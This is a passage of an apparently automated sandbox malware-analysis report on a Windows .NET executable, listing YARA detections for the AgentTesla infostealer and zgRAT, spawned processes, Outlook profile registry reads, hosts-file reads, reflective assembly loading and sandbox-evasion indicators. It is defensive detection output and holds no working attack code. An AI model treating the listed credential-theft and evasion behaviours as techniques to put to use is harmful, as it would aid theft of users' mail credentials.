                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b87A8F58Cu002dE7E8u002d43ADu002d9293u002dD820C15D240Cu007d/ED869E5Fu002dF8FEu002d4A77u002dA1BBu002dFA143876B5CC.csLarge array initialization: .cctor: array initializer size 10986
                Source: rzN2ckYW24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                Source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_02B3E390
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_02B3E38A
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_02B3C41C
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_075F18D8
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_075F18E8
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_00E8FA60
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_00E80227
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_00E86C60
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C4C638
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C429F8
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C40910
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C4D398
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_05C40040
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 2_2_06529408
                Source: rzN2ckYW24.exe, 00000000.00000000.253186404.0000000000A66000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVAZlQ.exe, vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000000.00000002.308322614.0000000007560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000002.00000002.518621296.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exe, 00000002.00000000.280006531.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exeBinary or memory string: OriginalFilenameVAZlQ.exe, vs rzN2ckYW24.exe
                Source: rzN2ckYW24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rzN2ckYW24.exeVirustotal: Detection: 30%
                Source: rzN2ckYW24.exeReversingLabs: Detection: 31%
                Source: rzN2ckYW24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rzN2ckYW24.exe.logJump to behavior
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4B06.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@3/2
                Source: rzN2ckYW24.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: rzN2ckYW24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: rzN2ckYW24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: rzN2ckYW24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Source: rzN2ckYW24.exe, BeerPalaceEPOSApp/MainMenuForm.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.rzN2ckYW24.exe.9c0000.0.unpack, BeerPalaceEPOSApp/MainMenuForm.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_075F5959 push ecx; ret
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeCode function: 0_2_077C3DFF pushad ; ret
                Source: rzN2ckYW24.exeStatic PE information: 0xBEFF304D [Fri Jul 17 21:44:45 2071 UTC]
                Source: initial sampleStatic PE information: section name: .text entropy: 7.934508263967678
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR
